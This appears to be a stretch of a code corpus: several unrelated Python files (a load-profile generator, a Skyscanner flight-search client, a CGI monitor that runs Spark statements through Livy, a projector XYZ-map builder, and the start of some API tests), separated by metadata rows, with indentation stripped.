ML = (np.cos(2 * np.pi/12 * np.linspace(0,11,12)) * 50 + 100 ) * 1000 # monthly load
ML = el.make_timeseries(ML) #convenience wrapper around pd.DataFrame with pd.DateTimeindex
#print(ML)
DWL = el.gen_daily_stoch_el() #daily load working
DNWL = el.gen_daily_stoch_el() #daily load non working
#print(sum(DNWL))
Weight = .60 # i.e energy will be split 55% in working day 45% non working day
Load1 = el.gen_load_from_daily_monthly(ML, DWL, DNWL, Weight)
Load1.name = 'L1'
Load1=Load1.round();
#print(Load1)
disag_profile = np.random.rand(60)
JanLoadEveryMinute=el.generate.disag_upsample(Load1[0:744],disag_profile, to_offset='min');
JanLoadEvery5mins=[];
l=0;
for i in range(0,JanLoadEveryMinute.shape[0]):
l=l+JanLoadEveryMinute[i];
if np.mod(i+1,5) == 0:
JanLoadEvery5mins.append(l);
l=0;
windDataDF = pd.read_excel('Data/WindEnergyData.xlsx');
generatorValuesEvery5mins=[];
for i in range(1,windDataDF.shape[0]):
randomValue=np.random.choice(100, 1)[0]
randomValue_prob = np.random.random();
if randomValue > windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'] or randomValue_prob < 0.4:
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'])
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'])
else :
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'] - randomValue)
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'] + randomValue)
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'])
print(len(generatorValuesEvery5mins))
print(len(JanLoadEvery5mins))
pickle.dump(generatorValuesEvery5mins, open("Data/generatorValuesEvery5mins.pkl", "wb"))
pickle.dump(JanLoadEvery5mins, open("Data/JanLoadEvery5mins.pkl", "wb"))
def trainTestSplit():
with open('Data/JanLoadEvery5mins.pkl', 'rb') as pickle_file:
loadProfile = pickle.load(pickle_file)
numOFTrainingIndices = int(np.round(0.8*len(loadProfile)))
trainIndices=np.random.choice(range(0,len(loadProfile)),numOFTrainingIndices,replace=False)
trainIndicesSet=set(trainIndices)
testIndices=[x for x in range(0,len(loadProfile)) if x not in trainIndicesSet]
pickle.dump(trainIndices, open("Data/trainIndices.pkl", "wb"))
pickle.dump(testIndices, open("Data/testIndices.pkl", "wb"))
#print(len(loadProfile))
#print(len(trainIndicesSet))
#print(len(trainIndices))
#print(len(testIndices))
#createLoadProfile()
#trainTestSplit()
| 48.436883
| 173
| 0.604496
| 5,862
| 44,126
| 4.348686
| 0.112078
| 0.046956
| 0.021183
| 0.015809
| 0.666209
| 0.609172
| 0.575004
| 0.547309
| 0.524361
| 0.491605
| 0
| 0.033267
| 0.290169
| 44,126
| 910
| 174
| 48.49011
| 0.780601
| 0.183135
| 0
| 0.477833
| 0
| 0
| 0.078518
| 0.01599
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050903
| false
| 0.003284
| 0.022989
| 0.003284
| 0.106732
| 0.054187
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e66f7324f463b84e3db235287a63c2e184564ad
| 10,104
|
py
|
Python
|
python_flights/client.py
|
sylvaus/python_flights
|
613f1ad294ecb53a54af1fa3ca78fa83b0badc30
|
[
"MIT"
] | 1
|
2020-01-12T18:55:45.000Z
|
2020-01-12T18:55:45.000Z
|
python_flights/client.py
|
sylvaus/python_flights
|
613f1ad294ecb53a54af1fa3ca78fa83b0badc30
|
[
"MIT"
] | null | null | null |
python_flights/client.py
|
sylvaus/python_flights
|
613f1ad294ecb53a54af1fa3ca78fa83b0badc30
|
[
"MIT"
] | null | null | null |
import logging
import time
from datetime import datetime, timedelta
from itertools import product
from typing import List
import requests
from python_flights.itinerary import Itinerary
from python_flights.pods import Country, Currency, Airport, Place, Agent, Carrier, Direction, Trip, Segment, Price, \
CabinClass, SortType, SortOrder
PARAM_DATE_FORMATTING = "%Y-%m-%d"
JSON_DATE_FORMATTING = "%Y-%m-%dT%H:%M:%S"
API_ADDRESS = "https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices"
LOCALES = [
'de-DE', 'el-GR', 'en-GB', 'en-US', 'es-ES', 'es-MX', 'et-EE', 'fi-FI', 'fr-FR', 'hr-HR', 'hu-HU', 'id-ID', 'it-IT',
'ja-JP', 'ko-KR', 'lt-LT', 'lv-LV', 'ms-MY', 'nb-NO', 'nl-NL', 'pl-PL', 'pt-BR', 'pt-PT', 'ro-RO', 'ru-RU', 'sk-SK',
'sv-SE', 'th-TH', 'tr-TR', 'uk-UA', 'vi-VN', 'zh-CN', 'zh-HK', 'zh-SG', 'zh-TW'
]
class FlightBrowser:
def __init__(self, api_key: str, locale="en-US", country="CA", currency="CAD"):
self._get_headers = {
'x-rapidapi-host': "skyscanner-skyscanner-flight-search-v1.p.rapidapi.com",
'x-rapidapi-key': f"{api_key}"
}
self._post_headers = {
'x-rapidapi-host': "skyscanner-skyscanner-flight-search-v1.p.rapidapi.com",
'x-rapidapi-key': f"{api_key}",
'content-type': "application/x-www-form-urlencoded"
}
self._locale = locale
self._country = country
self._currency = currency
self._currencies = None
self._logger = logging.getLogger(__name__ + "." + self.__class__.__name__)
@property
def currencies(self):
if self._currencies is None:
response = self._get(f"reference/v1.0/currencies")
if response.status_code != 200:
self._logger.warning(f"Request failed with status {response.status_code}")
return []
json = response.json()
self._currencies = [
Currency.from_json(currency_json)
for currency_json in json.get("Currencies", [])
]
return self._currencies
@property
def countries(self):
response = self._get(f"reference/v1.0/countries/{self._locale}")
if response.status_code != 200:
return []
json = response.json()
return [
Country.from_json(country_json)
for country_json in json.get("Countries", [])
]
def _get(self, url: str, params: dict = None):
if params is None:
params = {}
return requests.get(f"{API_ADDRESS}/{url}", headers=self._get_headers, params=params)
def _post(self, url: str, params: dict = None, data: str = ""):
if params is None:
params = {}
return requests.post(
f"{API_ADDRESS}/{url}", headers=self._post_headers
, params=params, data=data
)
def get_airports(self, keyword):
response = self._get(
f"autosuggest/v1.0/{self._country}/{self._currency}/{self._locale}/"
, params={"query": f"{keyword}"}
)
if response.status_code != 200:
return []
response_json = response.json()
return [
Airport.from_json(airport_json)
for airport_json in response_json.get("Places", [])
]
def get_flights(
self, departure_date: datetime, departure_id: str
, arrival_date: datetime, arrival_id: str
, cabin_class: CabinClass = None
, adults: int = 1, children: int = 0
, infants: int = 0, stops: int = None
, duration_mins: int = None, number_results: int = 10
, sort_type: SortType = None, sort_order: SortOrder = SortOrder.ASCENDING
) -> List[Itinerary]:
params = \
f"inboundDate={arrival_date.strftime(PARAM_DATE_FORMATTING)}" \
f"&country={self._country}¤cy={self._currency}" \
f"&locale={self._locale}&originPlace={departure_id}-sky&destinationPlace={arrival_id}-sky" \
f"&outboundDate={departure_date.strftime(PARAM_DATE_FORMATTING)}" \
f"&adults={adults}&children={children}&infants={infants}"
if cabin_class:
params += f"&cabinClass={cabin_class.value}"
self._logger.debug(f"Creating session with parameters {params}")
response = self._post("pricing/v1.0", data=params)
if response.status_code != 201:
return []
_, url = response.headers["Location"].split("/apiservices/")
params = {"pageIndex": "0", "pageSize": f"{number_results}"}
if duration_mins:
params["duration"] = f"{duration_mins}"
if stops:
params["stops"] = f"{stops}"
if sort_type:
params["sortType"] = f"{sort_type.value}"
params["sortOrder"] = f"{sort_order.value}"
self._logger.debug("Polling session")
response = self._get(url, params)
if response.status_code != 200:
return []
return self._extract_itineraries(response.json())
def _extract_itineraries(self, response_json) -> List[Itinerary]:
currencies = [
Currency.from_json(json_dict)
for json_dict in response_json.get("Currencies", [])
]
id_places = {
json_dict["Id"]: Place.from_json(json_dict)
for json_dict in response_json.get("Places", [])
}
id_agents = {
json_dict["Id"]: Agent.from_json(json_dict)
for json_dict in response_json.get("Agents", [])
}
id_carriers = {
json_dict["Id"]: Carrier.from_json(json_dict)
for json_dict in response_json.get("Carriers", [])
}
id_segments = {}
for json_dict in response_json.get("Segments", []):
id_ = json_dict["Id"]
departure_place = id_places[json_dict["OriginStation"]]
departure_time = datetime.strptime(json_dict["DepartureDateTime"], JSON_DATE_FORMATTING)
arrival_place = id_places[json_dict["DestinationStation"]]
arrival_time = datetime.strptime(json_dict["ArrivalDateTime"], JSON_DATE_FORMATTING)
carrier = id_carriers[json_dict["Carrier"]]
operating_carrier = id_carriers[json_dict["OperatingCarrier"]]
duration = timedelta(minutes=json_dict["Duration"])
flight_number = json_dict["FlightNumber"]
trip_type = json_dict["JourneyMode"]
direction = Direction.OUTBOUND if json_dict["Directionality"] == "Outbound" else Direction.INBOUND
id_segments[id_] = Segment(
id_, departure_place, departure_time, arrival_place, arrival_time,
carrier, operating_carrier, duration, flight_number, trip_type, direction
)
id_trips = {}
for json_dict in response_json.get("Legs", []):
id_ = json_dict["Id"]
segments = [
id_segments[segment_id]
for segment_id in json_dict.get("SegmentIds", [])
]
departure_place = id_places[json_dict["OriginStation"]]
departure_date = datetime.strptime(json_dict["Departure"], JSON_DATE_FORMATTING)
arrival_place = id_places[json_dict["DestinationStation"]]
arrival_date = datetime.strptime(json_dict["Arrival"], JSON_DATE_FORMATTING)
duration = timedelta(minutes=json_dict["Duration"])
stops = [
id_places[place_id]
for place_id in json_dict.get("Stops", [])
]
carriers = [
id_carriers[carrier_id]
for carrier_id in json_dict.get("Carriers", [])
]
operating_carriers = [
id_carriers[carrier_id]
for carrier_id in json_dict.get("Carriers", [])
]
direction = Direction.OUTBOUND if json_dict["Directionality"] == "Outbound" else Direction.INBOUND
id_trips[id_] = Trip(
id_, segments, departure_place, departure_date, arrival_place, arrival_date
, duration, stops, carriers, operating_carriers, direction
)
itineraries = []
for json_dict in response_json.get("Itineraries", []):
outbound_trip = id_trips[json_dict["OutboundLegId"]]
inbound_trip = id_trips[json_dict["InboundLegId"]]
prices = []
for price_dict in json_dict.get("PricingOptions", []):
agents = [id_agents[agent_id] for agent_id in price_dict["Agents"]]
quote_age = timedelta(minutes=price_dict["QuoteAgeInMinutes"])
price = price_dict["Price"]
url = price_dict["DeeplinkUrl"]
prices.append(Price(agents, quote_age, price, url))
itineraries.append(Itinerary(outbound_trip, inbound_trip, prices))
return itineraries
def get_flights_ranges(
self, departure_dates: List[datetime], departure_ids: List[str]
, arrival_dates: List[datetime], arrival_ids: List[str]
, *args, rate_limit_per_min: int = 40, **kwargs
) -> List[Itinerary]:
itineraries = []
# The time in between calls is multiplied by two because two requests are made to get flights
in_between_call_s = (60 / rate_limit_per_min) * 2
combinations = list(product(departure_dates, departure_ids, arrival_dates, arrival_ids))
nb_combinations = len(combinations)
for index, (departure_date, departure_id, arrival_date, arrival_id) in enumerate(combinations):
self._logger.debug(f"Getting itineraries {index} out of {nb_combinations}")
start_time = time.time()
itineraries.extend(
self.get_flights(departure_date, departure_id, arrival_date, arrival_id, *args, **kwargs)
)
time.sleep(max([0, in_between_call_s - (time.time() - start_time)]))
return itineraries
| 42.1
| 120
| 0.597387
| 1,137
| 10,104
| 5.065963
| 0.218997
| 0.054167
| 0.019444
| 0.023611
| 0.322396
| 0.267882
| 0.210764
| 0.174653
| 0.133333
| 0.133333
| 0
| 0.005215
| 0.278899
| 10,104
| 239
| 121
| 42.276151
| 0.785342
| 0.009006
| 0
| 0.198068
| 0
| 0
| 0.175607
| 0.063131
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.038647
| 0
| 0.149758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e675b79e0383d49ce47e747d971a54a4f4b735e
| 8,636
|
py
|
Python
|
python/monitor.py
|
ChrisArnault/fink_data_monitor
|
3ef3167204711222fb71d6d6f828bce4094ad21a
|
[
"Apache-2.0"
] | null | null | null |
python/monitor.py
|
ChrisArnault/fink_data_monitor
|
3ef3167204711222fb71d6d6f828bce4094ad21a
|
[
"Apache-2.0"
] | 8
|
2019-03-30T13:27:46.000Z
|
2019-06-05T13:55:26.000Z
|
python/monitor.py
|
ChrisArnault/fink_data_monitor
|
3ef3167204711222fb71d6d6f828bce4094ad21a
|
[
"Apache-2.0"
] | 1
|
2019-03-22T12:38:32.000Z
|
2019-03-22T12:38:32.000Z
|
#!/usr/bin/python
# coding: utf-8
# Copyright 2018 AstroLab Software
# Author: Chris Arnault
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Dataset monitor
This is the client part.
The monitor.py script has to be present on the <host> machine
where the minimal HTML server has been activated as
> python server.py
Then, call in a web navigator the URL
http://<host>:24701/monitor.py
"""
import cgi
from pylivy.session import *
from pylivy.client import *
from variables import HTMLVariableSet
# ======================================================
LIVY_URL = "http://vm-75222.lal.in2p3.fr:21111"
form = cgi.FieldStorage()
print("Content-type: text/html; charset=utf-8\n")
client = LivyClient(LIVY_URL)
# init data
html = HTMLVariableSet(["started",
"simul",
"change_simul",
"livy_session",
"waiting_session",
"waiting_statement",
"livy_statement",
"kill_session"],
["new_statement", "result"])
url = "/monitor.py"
method = "POST"
# ======================================================
def html_header():
"""
Global & common html header. SHould be used everywhere
Returns:
--------
out: str
"""
return """
<!DOCTYPE html>
<head>
<link rel="stylesheet" type="text/css" href="css/finkstyle.css">
<title>Mon programme test</title>
</head>
<body>
<div class="hero-image">
<div class="hero-text">
<h1 style="font-size:50px">Fink</h1>
<h3>Alert dataset monitor</h3>
<div class="topnav"> """
def html_trailer():
"""
Global & common html trailer. SHould be used everywhere
Returns:
--------
out: str
"""
return """
</div>
<p>© AstroLab Software 2018-2019</p>
</div>
</div>
</body>
</html>
"""
def html_manage_simulation_mode(out: str) -> str:
# manage Livy simulation
will_change_simul = html.change_simul.is_set()
print("<br>change simul = {}".format(will_change_simul))
html.change_simul.reset()
if will_change_simul:
if html.simul.is_set():
out += """<form action="{}" method="{}">""".format(url, method)
out += """
<br> Currently using real Livy"""
html.simul.reset()
out += html.to_form()
out += """<button type="submit">Simul Livy</button>
</form>
"""
else:
out += """<form action="{}" method="{}">""".format(url, method)
out += """
<br> Currently simulate Livy """
html.simul.set(1)
out += html.to_form()
out += """<button type="submit">Use real Livy</button>
</form>
"""
else:
if html.simul.is_set():
out += """<form action="{}" method="{}">""".format(url, method)
out += """
<br> Currently simulate Livy """
html.change_simul.set(1)
out += html.to_form()
out += """
<button type="submit">Use real Livy</button>
</form>
"""
else:
out += """<form action="{}" method="{}">""".format(url, method)
out += """
<br> Currently using real Livy"""
html.change_simul.set(1)
out += html.to_form()
out += """
<button type="submit">Simul Livy</button>
</form>
"""
# out += html.debug()
html.change_simul.reset()
return out
# Read all HTML POST variables
html.read(form)
if not html.started.is_set():
# Handle the very first launch to set the default
html.simul.set(1)
html.started.set(1)
# ======================================================
# the start of the WEB page
# ======================================================
out = html_header()
out = html_manage_simulation_mode(out)
# out += html.debug()
# Manage Livy session & Spark statements
out += """<form action="{}" method="{}">""".format(url, method)
if html.simul.is_set():
if html.waiting_session.above(5):
print("<br> session is now idle")
html.waiting_session.reset()
html.waiting_statement.reset()
html.livy_statement.reset()
html.livy_session.set(1)
if html.waiting_statement.above(5):
print("<br> statement just finished")
html.waiting_session.reset()
html.waiting_statement.reset()
html.livy_statement.incr()
# debugging
# print("<br>")
# print("Keys = [", ",".join(form.keys()), "]")
# print(html.debug())
"""
Command interface
- select Livy simulation
- open session & wait for idle
- start statement & wait for completion
"""
if html.kill_session.is_set():
session_id = html.livy_session.value
try:
client.delete_session(session_id)
except:
print("error killing session ", session_id)
html.livy_session.reset()
html.waiting_session.reset()
html.kill_session.reset()
if html.livy_session.is_set():
# statement management
if not html.waiting_statement.is_set():
out += """<br>session is idle: we may start a statement<br>"""
html.waiting_statement.set(0)
out += html.to_form()
out += """
Enter a Spark statement
<input type="text" name="new_statement" value="{}" />
<input type="text" name="result" value="{}" />
<button type="submit">Run</button>
""".format(html.new_statement.value, html.result.value)
else:
out += """<br>session is idle, we do wait a statement to complete<br>"""
html.waiting_statement.incr()
s = client.get_session(html.livy_session.value)
if not html.livy_statement.is_set():
st = client.create_statement(s.session_id, html.new_statement.value)
html.livy_statement.set(st.statement_id)
else:
st = client.get_statement(s.session_id, html.livy_statement.value)
if st.state == StatementState.AVAILABLE:
html.waiting_statement.reset()
html.result.set(st.output.text)
print("<br>", html.result.value)
html.livy_statement.reset()
out += html.to_form()
out += """<button type="submit">waiting statement to complete</button>"""
else:
# session management
if not html.waiting_session.is_set():
out += """<br>No session<br>"""
html.waiting_session.set(0)
# print(html.waiting_session.debug())
html.waiting_statement.reset()
out += html.to_form()
out += """<button type="submit">Open a session</button>"""
else:
# we have requested a new session thus waiting_session is set
if html.simul.is_set():
html.waiting_session.incr()
else:
if not html.livy_session.is_set():
print("Create a session ")
s = client.create_session(SessionKind.PYSPARK)
print("<br> session {} <br>".format(s.session_id))
html.livy_session.set(s.session_id)
# we test if the session is already idle
s = client.get_session(html.livy_session.value)
if s.state == SessionState.IDLE:
print("<br> session is now idle")
html.waiting_session.reset()
html.waiting_statement.reset()
html.livy_statement.reset()
html.new_statement.reset()
out += """<br>Waiting session to become idle<br>"""
out += html.to_form()
out += """<button type="submit">waiting session</button>"""
out += """</form>"""
if html.livy_session.is_set():
out += """<form action="{}" method="{}">""".format(url, method)
html.kill_session.set(1)
out += html.to_form()
out += """
<button type="submit">Delete the session</button>
</form>
"""
out += html_trailer()
print(out)
| 28.50165
| 81
| 0.559287
| 1,013
| 8,636
| 4.661402
| 0.24383
| 0.041931
| 0.017154
| 0.024778
| 0.371453
| 0.286955
| 0.257518
| 0.250318
| 0.232952
| 0.197374
| 0
| 0.008476
| 0.275938
| 8,636
| 302
| 82
| 28.596026
| 0.746682
| 0.201135
| 0
| 0.430168
| 0
| 0
| 0.317011
| 0.018718
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01676
| false
| 0
| 0.022346
| 0
| 0.055866
| 0.055866
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e687cbd3bdfdf17c399fa781c8f96210ee0138e
| 8,457
|
py
|
Python
|
python/src/buildXyzMapCommand.py
|
kylemcdonald/LightLeaks
|
f72719c4f46e4ec0cf8f37b520f7be859381d43b
|
[
"MIT"
] | 57
|
2015-01-06T13:07:04.000Z
|
2022-03-26T04:05:50.000Z
|
python/src/buildXyzMapCommand.py
|
kylemcdonald/LightLeaks
|
f72719c4f46e4ec0cf8f37b520f7be859381d43b
|
[
"MIT"
] | 34
|
2015-01-01T21:18:50.000Z
|
2021-09-02T16:28:10.000Z
|
python/src/buildXyzMapCommand.py
|
kylemcdonald/LightLeaks
|
f72719c4f46e4ec0cf8f37b520f7be859381d43b
|
[
"MIT"
] | 11
|
2015-02-23T18:56:22.000Z
|
2020-07-19T07:50:11.000Z
|
import click
import json
import os
import re
from tqdm import tqdm
from utils.imutil import *
import numpy as np
import math
PROCESSED_SCAN_FOLDER = 'processedScan'
def buildXyzMap(data_dir, prefix):
projector_size = get_projector_size(data_dir)
click.echo("Projector resolution %i x %i (from settings.json)" %
(projector_size[0], projector_size[1]))
if not os.path.exists(os.path.join(data_dir, 'mask-0.png')):
click.secho(
f'Error: Projector mask not found at path {os.path.join(data_dir, "mask-0.png")}', err=True, fg='red')
return
scan_folders = sorted(
[f for f in os.listdir(data_dir) if re.match('^'+prefix, f)])
scan_folders = list(filter(lambda x: os.path.isdir(
os.path.join(data_dir, x, PROCESSED_SCAN_FOLDER)), scan_folders))
if len(scan_folders) == 0:
click.secho(
f"No scans found {data_dir} with prefix {prefix}", err=True, fg="red")
return
deduped = None
for i, folder in tqdm(enumerate(scan_folders), total=len(scan_folders)):
tqdm.write(folder + f": Loading processed scan")
processed_path = os.path.join(data_dir, folder, PROCESSED_SCAN_FOLDER)
cam_confidence = imread(os.path.join(
processed_path, 'camConfidence.exr'))
cam_binary_map = np.load(os.path.join(processed_path, 'camBinary.npy'))
cam_width = cam_confidence.shape[1]
cam_height = cam_confidence.shape[0]
# tqdm.write(f"{folder}: Camera size {cam_width}x{cam_height}")
# Load binary file from camamok
cam_xyz_map = np.fromfile(os.path.join(
data_dir, folder, 'camamok', 'xyzMap.raw'), np.float32)
# Determine scale factor of binary file (probably 4 if code hasnt changed in camamok)
scale_factor = math.floor(
1/math.sqrt((len(cam_xyz_map) / 4) / (cam_width * cam_height)))
tqdm.write(folder + f": upscaling xyz map by {scale_factor}")
# Reshape camamok xyz map
cam_xyz_map = cam_xyz_map.reshape(
int(cam_height / scale_factor), int(cam_width / scale_factor), 4)[:, :, 0:3]
cam_xyz_map = upsample(cam_xyz_map, scale=scale_factor)
tqdm.write(folder + f": xyz map size {cam_xyz_map.shape}")
# tqdm.write(f'{folder}: cam xyz minimum: {np.min(cam_xyz_map)}, max: {np.max(cam_xyz_map)}')
assert len(cam_confidence) > 0
assert len(cam_binary_map) > 0
assert len(cam_xyz_map) > 0
tqdm.write(folder + f": Packing data")
packed = pack_maps(cam_confidence, cam_binary_map,
cam_xyz_map, i, projector_size)
tqdm.write(
f'{folder}: Packed {packed.shape[0]:,} pixels. Removing duplicate pixels')
if deduped is not None:
# print('deduped before:', deduped.shape)
packed = np.vstack((packed, deduped))
# print('packed after:', packed.shape)
deduped = dedupe(packed)
tqdm.write(
f'{folder}: {deduped.shape[0]:,} pixels in deduplicated stack')
click.echo("Done processing scanes. Unpacking projector map")
projector_xyz, projector_confidence, cam_index_map, cam_pixel_index = unpack_maps(
deduped, projector_size)
cam_index_map_colored = np.copy(cam_index_map)
cam_index_map_colored[projector_confidence < 0.1] = -1
cam_index_map_colored = cam_index_map_colored * \
255 / (cam_index_map.max()+1)
cam_index_map_colored = cv2.applyColorMap(
cam_index_map_colored.astype(np.uint8), cv2.COLORMAP_JET)
# imshow(cam_index_map_colored, fmt='jpg')
# Store result
debug_out_path = os.path.join(data_dir, 'BuildXYZ')
if not os.path.exists(debug_out_path):
os.makedirs(debug_out_path)
projector_mask = imread(os.path.join(
data_dir, 'mask-0.png')).mean(axis=2) / 255
projector_confidence_masked = projector_confidence * \
projector_mask[:, :, np.newaxis]
imwrite(os.path.join(debug_out_path, 'confidenceMap-0.exr'),
projector_confidence_masked.astype(np.float32))
imwrite(os.path.join(debug_out_path, 'xyzMap-0.exr'),
projector_xyz.astype(np.float32))
imwrite(os.path.join(debug_out_path, 'camIndexMap.png'), cam_index_map)
imwrite(os.path.join(debug_out_path, 'camIndexMapColored.png'),
cam_index_map_colored)
with open(os.path.join(debug_out_path, "BuildXYZOutput.txt"), "w") as text_file:
def t(text):
text_file.write("%s\n" % text)
click.echo(text)
t("Scans used:")
for s in scan_folders:
t("\t%s" % s)
t("Resolution: %ix%i" % (projector_size[0], projector_size[1]))
threshold = 0.05
t("\nCoverage (threshold %.2f):" % threshold)
masked_camIndexMap = np.copy(cam_index_map)
masked_camIndexMap[projector_confidence < threshold] = -1
u, c = np.unique(masked_camIndexMap, return_counts=True)
for _u, _c in zip(u, c):
if _u != -1:
t("\tScan %i (%s): %.2f%% (%i)" %
(_u, scan_folders[int(_u)], 100*_c / sum(c), _c))
else:
t("\tNo scan: %.2f%% (%i)" % (100*_c / sum(c), _c))
def get_projector_size(data_dir):
with open(os.path.join(data_dir, 'settings.json')) as json_file:
data = json.load(json_file)
proj_width = data['projectors'][0]['width']
proj_height = data['projectors'][0]['height']
return proj_width, proj_height
def overflow_fix(cam_binary_map, proj_size):
cam_binary_map[(cam_binary_map[:, 0] >= proj_size[0]) | (
cam_binary_map[:, 1] >= proj_size[1])] = [0, 0]
# rows, cols = camHeight, camWidth
# confidence.shape: rows, cols (float)
# cam_binary_map.shape: rows, cols, 2 (int)
# cam_xyz_map.shape: rows, cols, 3 (float)
# cam_index: int
def pack_maps(confidence, cam_binary_map, cam_xyz_map, cam_index, proj_size):
""" Pack camera confidence, cam binary projector map and camera xyz map """
# prepare confidence_flat
confidence_flat = confidence.reshape(-1, 1)
# prepare cam_binary_mapFlat
cam_binary_map_flat = cam_binary_map.reshape((-1, 2))
overflow_fix(cam_binary_map_flat, proj_size)
cam_binary_map_flat = np.ravel_multi_index(cam_binary_map_flat.transpose()[
::-1], (proj_size[1], proj_size[0])).reshape(-1, 1)
# prepare cam_xyz_map_flat
# scale = len(cam_binary_map) / len(cam_xyz_map)
cam_xyz_map_flat = cam_xyz_map.reshape(-1, 3)
# DEBUG STUFF
# Pack camera index into array
cam_index_flat = np.full((cam_xyz_map_flat.shape[0], 1), cam_index)
# Cam Pixel Index
cam_pixel_index = np.arange(cam_xyz_map_flat.shape[0])[:, np.newaxis]
# stack and return everything in shape: (rows x cols), 7
return np.hstack((confidence_flat, cam_binary_map_flat, cam_xyz_map_flat, cam_index_flat, cam_pixel_index))
def dedupe(packed):
# get indices sorted by confidence, use ::-1 to put max confidence first
packedSortedIndices = packed[:, 0].argsort()[::-1]
packedSorted = packed[packedSortedIndices]
# get unique packedSorted indices
_, indices = np.unique(packedSorted.transpose()[1], return_index=True)
return packedSorted[indices]
def unpack_maps(packed, proj_size):
""" Unpack projector xyz map and projector confidence """
proj_width = proj_size[0]
proj_height = proj_size[1]
projector_xyz = np.zeros((proj_height, proj_width, 3))
projector_confidence = np.zeros((proj_height, proj_width, 1))
cam_index = np.full((proj_height, proj_width, 1), -1)
cam_pixel_index = np.zeros((proj_height, proj_width, 1))
# assign xyzMap values use proMapFlat indices
# packed[:,0] contains confidence value
# packed[:,1] contains binary code (projector pixel coordinate)
# packed[:,2:5] contains xyz coordinate
# packed[:,5] contains camera index (debug)
# packed[:,6] contains camera pixel index (debug)
proMapFlat = packed[:, 1].astype(np.int32)
projector_confidence.reshape(-1)[proMapFlat] = packed[:, 0]
projector_xyz.reshape(-1, 3)[proMapFlat] = packed[:, 2:5]
# DEBUG STUFF
cam_index.reshape(-1)[proMapFlat] = packed[:, 5]
cam_pixel_index.reshape(-1)[proMapFlat] = packed[:, 6].astype(np.uint64)
return projector_xyz, projector_confidence, cam_index, cam_pixel_index
| 38.793578
| 114
| 0.653541
| 1,182
| 8,457
| 4.432318
| 0.192047
| 0.028631
| 0.034358
| 0.021378
| 0.244131
| 0.127505
| 0.064325
| 0.031113
| 0.016797
| 0.016797
| 0
| 0.017294
| 0.220527
| 8,457
| 217
| 115
| 38.97235
| 0.777458
| 0.159513
| 0
| 0.044444
| 0
| 0.007407
| 0.11281
| 0.006369
| 0
| 0
| 0
| 0
| 0.022222
| 1
| 0.051852
| false
| 0
| 0.059259
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e698f12281208ec9285a26a2656c4de0a23f99f
| 3,383
|
py
|
Python
|
api/tests/test_bad_queries.py
|
jpclark6/datalake
|
d9dceabe889f55ce589494fae5d00a27985e8088
|
[
"Apache-2.0"
] | 2
|
2016-12-11T18:00:08.000Z
|
2017-12-26T22:47:15.000Z
|
api/tests/test_bad_queries.py
|
jpclark6/datalake
|
d9dceabe889f55ce589494fae5d00a27985e8088
|
[
"Apache-2.0"
] | 10
|
2015-09-24T00:32:55.000Z
|
2017-09-14T02:15:53.000Z
|
api/tests/test_bad_queries.py
|
jpclark6/datalake
|
d9dceabe889f55ce589494fae5d00a27985e8088
|
[
"Apache-2.0"
] | 2
|
2016-12-21T16:49:47.000Z
|
2019-02-24T23:58:11.000Z
|
# Copyright 2015 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import simplejson as json
import base64
def get_bad_request(client, params):
uri = '/v0/archive/files/'
q = '&'.join(['{}={}'.format(k, v) for k, v in params.iteritems()])
if q:
uri += '?' + q
res = client.get(uri)
assert res.status_code == 400
response = json.loads(res.get_data())
assert 'code' in response
assert 'message' in response
return response
def test_no_parameters(client):
res = get_bad_request(client, {})
assert res['code'] == 'NoArgs'
def test_no_what_parameter(client):
res = get_bad_request(client, {'start': 123})
assert res['code'] == 'NoWhat'
def test_no_work_id_or_interval(client):
res = get_bad_request(client, {'what': 'syslog'})
assert res['code'] == 'NoWorkInterval'
def test_work_id_and_start(client):
params = {
'what': 'syslog',
